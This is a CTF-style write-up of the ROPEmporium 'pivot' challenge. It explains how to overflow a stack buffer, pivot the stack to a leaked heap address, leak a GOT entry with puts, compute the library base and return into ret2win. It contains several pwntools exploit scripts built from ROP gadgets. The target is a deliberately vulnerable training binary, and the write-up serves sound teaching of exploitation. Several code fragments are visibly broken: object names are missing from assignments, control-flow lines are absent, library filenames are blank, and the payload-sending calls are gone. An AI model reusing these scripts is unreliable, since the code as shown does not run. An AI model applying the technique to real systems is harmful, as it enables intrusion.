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"pivot" ROPEmporium Challenge 7 Writeup

The usual...

checksec --file=pivot
rabin2 -z pivot
rabin2 -z
objdump -d pivot
objdump -d

libpivot contains a foothold_function which is also imported into pivot as foothold_function@plt, but never called. Furthermore, there is a ret2win function within libpivot, it is our goal to call it, however ret2win has no plt entry in our main pivot executable.

The pivot's main allocates some memory on the heap, then passes a pointer to this forward to pwnme. The heap address is already being leaked by the app itself, we don't need to do anything in that regard. pwnme first reads 256 (0x100) bytes into this heap region, then reads another 64 (0x40) bytes onto the stack (where only 0x20 or 32 bytes should've been read).

gdb ./pivot
b *pwnme+165 # break before the second read onto the stack
hello, world # first read onto heap, type in some stuff
# breakpoint hit
pattern create 200
# copy-paste pattern as input to second read
# Segmentation fault
x/x $rsp
# 0x4141464141304141
pattern offset 0x4141464141304141
# 4702116732032008513 found at offset: 40

In order to call ret2win we need to know its real address. The ROPEmporium suggests a few different approaches.

Solution 1

There are a few different ways you could approach this problem; printing functions like puts() can be used to leak values from the binary, after which execution could be redirected to the start of main() for example, where you're able to send a fresh ROP chain that contains an address calculated from the leak.

  • Use puts or printf to leak the address of foothold_function. Note that in order to get the correct address, foothold_function needs to be called once first for the address to be resolved, only then we can leak it.
  • Having leaked the address, we jump back to main to run another ROP-chain.
  • Since we have the binary, we know the offset of both foothold_function (0x096a) and ret2win (0x0a81).
  • ret2win's real address must then be [email protected] - 0x096a + 0x0a81.

But just how does this PLT business work?

0000000000400720 <foothold_function@plt>:
  400720:       ff 25 1a 09 20 00       jmpq   *0x20091a(%rip)        # 601040 <foothold_function>
  400726:       68 05 00 00 00          pushq  $0x5
  40072b:       e9 90 ff ff ff          jmpq   4006c0 <.plt>

The first jmp instruction points to an entry in the .got.plt section. At first, this entry points right back to the push instruction on the next line.

GDB shows us that the jmp instruction resolves back to the next line, the push instruction.

An offset identifying the function to be resolved is pushed onto the stack (pushq $0x5), then the dynamic loader is called (jmpq 4006c0 <.plt>) to resolve the function's address for us. The loader updates the pointer in the .got.plt section so that it points to the function's resolved address.

In all future calls the jmp will directly go to the right address.

In GDB we can now see that the function pointer has been updated, pointing to the resolved address.

Using pwntools we obtain the pointer into the .got.plt section using foothold_got =['foothold_function'].

We can also list the different sections with readelf -S pivot and specifically the contents of the .got.plt section by using readelf -r pivot.

Relocation section '.rela.plt' at offset 0x5c8 contains 9 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000601040  000800000007 R_X86_64_JUMP_SLO 0000000000000000 foothold_function + 0
# this ----^
# ... SNIP: other entries ..

puts prints out a null-terminated string found at the address pointed to by its only argument ($rdi). In other words, if we give puts the pointer into the .got.plt, it will dereference it and print out the function address stored there.

payload += p64(pop_rdi) + p64(foothold_got) + p64(puts_plt)

This blog provides a more detailed explanation.

We use the pwntools library to create an exploit script.

#!/usr/bin/env python3
from pwn import *
context.bits = 64
context.arch = 'amd64'

process_name = './pivot'
lib_name = './'
elf = ELF(process_name)
libelf = ELF(lib_name)
rop = ROP(elf)

DEBUG = True
# ret of pwnme
b *pwnme+182
b main
# pop rdi; ret gadget
#b *0x400a33

    p = gdb.debug(process_name, DEBUG_ARGS)
    p = process(process_name)

When run, the app voluntarily leaks the heap address, we parse it using:

p.recvuntil(b'place to pivot: ')
heap_address = p.recvuntil(b'Send a ROP')
heap_address = heap_address.replace(b'\nSend a ROP', b'')
heap_address = int(heap_address, 16)
info('READ HEAP ADDRESS: %s' % hex(heap_address))

Because there is not enough space in our buffer overflow, we make the stack pointer point to the leaked heap address, effectively moving the stack into a much bigger area under our control.

We find a gadget to pop rsp:

pop_rsp = rop.find_gadget(['pop rsp'])
# Gadget(0x400a2d, ['pop rsp', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['rsp', 'r13', 'r14', 'r15'], 0x28)

It also pops three more registers, we just put dummy values in them.

pop_rsp = rop.find_gadget(['pop rsp'])[0]

stack_payload  = b'A'*40
stack_payload += p64(pop_rsp)
stack_payload += p64(heap_address)

assert len(stack_payload) <= 64, "Stack payload must NOT be larger than 64 bytes!"

After popping the leaked heap address into $rsp, the next value will be popped from our heap memory, so we write the rest of our ROP-chain there:

heap_payload  = p64(0x13) + p64(0x14) + p64(0x15)                # dummy values

The foothold_function is imported into our binary, therefore there is a .plt entry:

0000000000400720 <foothold_function@plt>:
  400720:       ff 25 1a 09 20 00       jmpq   *0x20091a(%rip)        # 601040 <foothold_function>
  400726:       68 05 00 00 00          pushq  $0x5
  40072b:       e9 90 ff ff ff          jmpq   4006c0 <.plt>

We resolve foothold_function and then leak its address. This done, with a little detour over an extra ret (otherwise a movaps instruction within buffered_vfprintf() would crash our process due to our messing with the stack making it unaligned) we go back to main.

foothold_plt = elf.plt['foothold_function']
foothold_got =['foothold_function']
puts_plt     = elf.plt['puts']
main_func    = elf.sym['main']

pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret     = rop.find_gadget(['ret'])[0]

heap_payload  = p64(0x13) + p64(0x14) + p64(0x15)                # dummy values
heap_payload += p64(foothold_plt)                                # call foothold to resolve its address
heap_payload += p64(pop_rdi) + p64(foothold_got) + p64(puts_plt) # load foothold's .got.plt entry into $rdi, call puts to print out the resolved address it points to.
heap_payload += p64(ret)                                         # extra padding for stack alignment
heap_payload += p64(main_func)                                   # re-run from main

assert len(heap_payload) <= 256, "Heap payload must NOT be larger than 256 bytes!"

Meanwhile we use pwntools to parse the leaked address from stdout. To calculate the library base, we subtract the function's offset from its leaked address.

p.recvuntil(b'gain a foothold into libpivot\n')
leaked_foothold_got = p.recvuntil(b'\n')
leaked_foothold_got = leaked_foothold_got.replace(b'\n', b'')
leaked_foothold_got = u64(leaked_foothold_got.ljust(8, b'\x00'))
info('LEAKED FOOTHOLD GOT: %s' % hex(leaked_foothold_got))

# library base =    foothold_address - 0x096a
libelf.address = leaked_foothold_got - libelf.sym['foothold_function']
info('FOUND LIBRARY BASE @ %s' % hex(libelf.address))

The disassembly of foothold_function for reference, placed at offset 0x096a:

000000000000096a <foothold_function>:
 96a:   55                      push   %rbp
 96b:   48 89 e5                mov    %rsp,%rbp
 96e:   48 8d 3d ab 01 00 00    lea    0x1ab(%rip),%rdi        # b20 <_fini+0xc>
 975:   e8 b6 fe ff ff          callq  830 <puts@plt>
 97a:   90                      nop
 97b:   5d                      pop    %rbp
 97c:   c3                      retq

On the second run from main we just input dummy text into the heap, this time our payload is small enough to fit on the stack. Now that we know the real addresses of any of the library's functions, we can easily return to ret2win completing the challenge.

p.recvuntil(b'> ') # wait till the program is ready to process input

second_stack_payload  = b'A'*40                    # overflow stack
second_stack_payload += p64(libelf.sym['ret2win']) # jump directly to the resolved address

assert len(second_stack_payload) <= 64, "Stack payload must NOT be larger than 64 bytes!"
The full exploit script
#!/usr/bin/env python3
from pwn import *
context.bits = 64
context.arch = 'amd64'

process_name = './pivot'
lib_name = './'
elf = ELF(process_name)
libelf = ELF(lib_name)
rop = ROP(elf)

DEBUG = False
# ret of pwnme
b *pwnme+182
b main
# pop rdi; ret gadget
#b *0x400a33

    p = gdb.debug(process_name, DEBUG_ARGS)
    p = process(process_name)

foothold_plt = elf.plt['foothold_function']
foothold_got =['foothold_function']
puts_plt     = elf.plt['puts']
main_func    = elf.sym['main']

pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
pop_rsp = rop.find_gadget(['pop rsp'])[0]
ret     = rop.find_gadget(['ret'])[0]

# The make the challenge simpler, the app will helpfully print out the heap
# address.
p.recvuntil(b'place to pivot: ')
heap_address = p.recvuntil(b'Send a ROP')
heap_address = heap_address.replace(b'\nSend a ROP', b'')
heap_address = int(heap_address, 16)
info('READ HEAP ADDRESS: %s' % hex(heap_address))

# First we can write up to 256 (0x100) bytes onto the heap.
# Our pop_rsp gadget (used further down) first makes the stack point to here,
# then it will pop the three registers r13, r14, and r15.
heap_payload  = p64(0x13) + p64(0x14) + p64(0x15)
heap_payload += p64(foothold_plt)                                # call foothold to resolve its address
heap_payload += p64(pop_rdi) + p64(foothold_got) + p64(puts_plt) # load foothold's .got.plt entry into $rdi, call puts to print out the resolved address it points to.
heap_payload += p64(ret)                                         # extra padding for stack alignment
heap_payload += p64(main_func)                                   # re-run from main

assert len(heap_payload) <= 256, "Heap payload must NOT be larger than 256 bytes!"

# Then we read up to 64 (0x40) bytes onto the stack.
stack_payload  = b'A'*40 # overflow buffer
stack_payload += p64(pop_rsp)
stack_payload += p64(heap_address)

assert len(stack_payload) <= 64, "Stack payload must NOT be larger than 64 bytes!"

p.recvuntil(b'gain a foothold into libpivot\n')
leaked_foothold_got = p.recvuntil(b'\n')
leaked_foothold_got = leaked_foothold_got.replace(b'\n', b'')
leaked_foothold_got = u64(leaked_foothold_got.ljust(8, b'\x00'))
info('LEAKED FOOTHOLD GOT: %s' % hex(leaked_foothold_got))
libelf.address = leaked_foothold_got - libelf.sym['foothold_function']
info('FOUND LIBRARY BASE @ %s' % hex(libelf.address))

# At this point we have restarted the app from main.
# This run we use the calculated addresses to call ret2win directly from pwnme.
p.recvuntil(b'> ')                                                                 # wait till the program is ready to process input
p.sendline(b'Thank you heap you\'ve been very useful, but I won\'t need you now!') # this time we won't need the heap

second_stack_payload  = b'A'*40                    # overflow stack
second_stack_payload += p64(libelf.sym['ret2win']) # jump directly to the resolved address

assert len(second_stack_payload) <= 64, "Stack payload must NOT be larger than 64 bytes!"



The exploit script is run and the flag is printed out to the terminal.

Solution 2

Another solution could be to modify a .got.plt entry in-place using a write gadget, then calling the function whose entry you modified.

I'm not quite sure what the intentions are here, but here goes my interpretation of it:

  • Call foothold_function@plt to resolve its address
  • Add the offset ret2win - foothold_function to the resolved address
  • Call foothold_function@plt again, which will now jump to ret2win

"Could be" seems to be the correct wording here, I was unable to find any gadgets that would allow for such a thing.

My (unsuccessful) attempt
#!/usr/bin/env python3
from pwn import *
context.bits = 64
context.arch = 'amd64'

process_name = './pivot'
library_name = './'
elf = ELF(process_name)
libelf = ELF(library_name)
rop = ROP(elf)

DEBUG = False
# at ret of pwnme
b *pwnme+182
# usefulGadgets
b *0x4009bb

    p = gdb.debug(process_name, DEBUG_ARGS)
    p = process(process_name)

foothold_plt = elf.plt['foothold_function']
foothold_got =['foothold_function']
# distance between foothold and ret2win =  0xA81 - 0x96A
win_offset_from_foothold = libelf.sym['ret2win'] - libelf.sym['foothold_function']

pop_rsp = rop.find_gadget(['pop rsp'])[0] # followed by pop r13, r14, and r15!!
pop_rax = rop.rax.address # 0x4009bb, equivalent to: rop.find_gadget(['pop rax', 'ret'])[0]
mov_rax = 0x004009c0      # apparently, ROP() doesn't know any gadgets starting with `mov`, so we have to hard code it.
pop_rbp = rop.rbp.address # 0x4007c8
add_rbp_rax = 0x004009c4

# ** Parse heap address
p.recvuntil(b'place to pivot: ')
heap_address = p.recvuntil(b'Send a ROP')
heap_address = heap_address.replace(b'\nSend a ROP', b'')
heap_address = int(heap_address, 16)
info('READ HEAP ADDRESS: %s' % hex(heap_address))

# ** Input heap payload
heap_payload  = p64(0x13) + p64(0x14) + p64(0x15)
# 1. Resolve foothold by calling it
heap_payload += p64(foothold_plt)
# 2. Load foothold@got into $rax register
#heap_payload += p64(pop_rax)
#heap_payload += p64(foothold_got)
# TODO: figure it out
# some add (byte/dword/qword) pointer, reg
# 0x0000000000400a3c : add byte ptr [rax], al ; add byte ptr [rax], al ; ret
# ^ can't work out, its adding values from the same register
# foothold/(%rax): 0x7faeaf1f c96a
#                  0x7faeaf1f ca81
# we probably would have to take at least the first two bytes into account
# this one maybe? ---v
# 0x000000000040078d : add byte ptr [rax], r8b ; ret
# 0x0000000000400828 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
# problem: we can't control r8

# 0x0000000000400c8b : call qword ptr [rbx]

# Or: read value out mov (%rax),%rax
# add
# write back in ?? is there any such gadget ?? Answer: no, there isn't

# ~~Or: use fgets to overwrite value?~~ there is no fgets!

# pop rbp; ret #['foothold_function'] + 0x3d
# 0x00000000004007c8 : pop rbp ; ret
heap_payload += p64(pop_rbp)
heap_payload += p64(foothold_got - 0x3d)
# add [rbp], reg # reg = 0xa81 - 0x96a
# 0x0000000000400828 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
heap_payload += p64(0x00400828)
# but again: we can't control ebx/rbx either!

assert len(heap_payload) <= 256, "Heap payload must NOT be larger than 256 bytes!"
p.recvuntil(b'> ')

# ** Input stack payload
stack_payload  = b'A'*40
# Move stack to the heap
stack_payload += p64(pop_rsp)
stack_payload += p64(heap_address)
# Values are now pop'ed from the heap memory

assert len(stack_payload) <= 64, "Stack payload must NOT be larger than 64 bytes!"
p.recvuntil(b'> ')


Solution 3

You could also read a .got.plt entry into a register, modify it in-memory, then redirect execution to the address in that register.

  • Call foothold_function@plt once, so that its address is resolved.
  • Read its .got.plt entry into a register, modify it in-memory, redirect execution to the address in the register.
  • To call ret2win we modify the address to be [email protected] - 0x096a + 0x0a81

We still need to pivot the stack, the logic for this is the same as it was in the other solutions.

stack_payload  = b'A'*40
# Move stack to the heap
stack_payload += p64(pop_rsp)
stack_payload += p64(heap_address)
# Values are now being pop'ed from the heap memory

We resolve the foothold_function by calling it's @plt, then we load the .got.plt table pointer into the $rax register. Using a mov (%rax),%rax gadget, we dereference the pointer, yielding us the resolved address, which is stored into $rax.

heap_payload  = p64(0x13) + p64(0x14) + p64(0x15)
# Resolve foothold by calling it
heap_payload += p64(foothold_plt)
# Load foothold@got into $rax register
heap_payload += p64(pop_rax)
heap_payload += p64(foothold_got)
heap_payload += p64(mov_rax)

Because we actually have the binary, we now the offsets of the foothold_function and ret2win, so we just have to add the difference to $rax.

win_offset_from_foothold = libelf.sym['ret2win'] - libelf.sym['foothold_function']
heap_payload += p64(pop_rbp)
heap_payload += p64(win_offset_from_foothold)
heap_payload += p64(add_rbp_rax)

pwmtools is rather disappointing when it comes to finding ROP gadgets, but so was radare2 which is usually better at this. Luckily, with ROPgadget I discovered a great gadget:

ROPgadget --binary ./pivot --filter 'and|add'
Gadgets information
# ============================================================
# ... SNIP: bunch of other gadgets ..
# Exactly what we need:
# 0x00000000004006b0 : call rax

So the only thing that's left to do is calling the function whose address we already have in $rax.

heap_payload += p64(call_rax)
The full exploit script
#!/usr/bin/env python3
from pwn import *
context.bits = 64
context.arch = 'amd64'

process_name = './pivot'
library_name = './'
elf = ELF(process_name)
libelf = ELF(library_name)
rop = ROP(elf)

DEBUG = False
# at ret of pwnme
b *pwnme+182
# usefulGadgets
b *0x4009bb

    p = gdb.debug(process_name, DEBUG_ARGS)
    p = process(process_name)

foothold_plt = elf.plt['foothold_function']
foothold_got =['foothold_function']
# distance between foothold and ret2win =  0xA81 - 0x96A
win_offset_from_foothold = libelf.sym['ret2win'] - libelf.sym['foothold_function']

pop_rsp = rop.find_gadget(['pop rsp'])[0] # followed by pop r13, r14, and r15!!
pop_rax = rop.rax.address # 0x4009bb, equivalent to: rop.find_gadget(['pop rax', 'ret'])[0]
mov_rax = 0x004009c0      # apparently, ROP() doesn't know any gadgets starting with `mov`, so we have to hard code it.
pop_rbp = rop.rbp.address # 0x4007c8
add_rbp_rax = 0x004009c4
call_rax = 0x004006b0

# ** Parse heap address
p.recvuntil(b'place to pivot: ')
heap_address = p.recvuntil(b'Send a ROP')
heap_address = heap_address.replace(b'\nSend a ROP', b'')
heap_address = int(heap_address, 16)
info('READ HEAP ADDRESS: %s' % hex(heap_address))

# ** Input heap payload
heap_payload  = p64(0x13) + p64(0x14) + p64(0x15)
# 1. Resolve foothold by calling it
heap_payload += p64(foothold_plt)
# 2. Load foothold@got into $rax register
heap_payload += p64(pop_rax)
heap_payload += p64(foothold_got)
heap_payload += p64(mov_rax)
# 3. Add offset for ret2win function to $rax
heap_payload += p64(pop_rbp)
heap_payload += p64(win_offset_from_foothold)
heap_payload += p64(add_rbp_rax)
# 4. Call the function pointed to by $rax
heap_payload += p64(call_rax)

assert len(heap_payload) <= 256, "Heap payload must NOT be larger than 256 bytes!"
p.recvuntil(b'> ') # wait 'til app is ready to receive input

# ** Input stack payload
stack_payload  = b'A'*40
# Move stack to the heap
stack_payload += p64(pop_rsp)
stack_payload += p64(heap_address)
# Values are now pop'ed from the heap memory

assert len(stack_payload) <= 64, "Stack payload must NOT be larger than 64 bytes!"
p.recvuntil(b'> ') # wait 'til app is ready to receive input


I like this solution more than the first one, since it doesn't involve any leaking of values, besides the heap address (which you could probably also do without).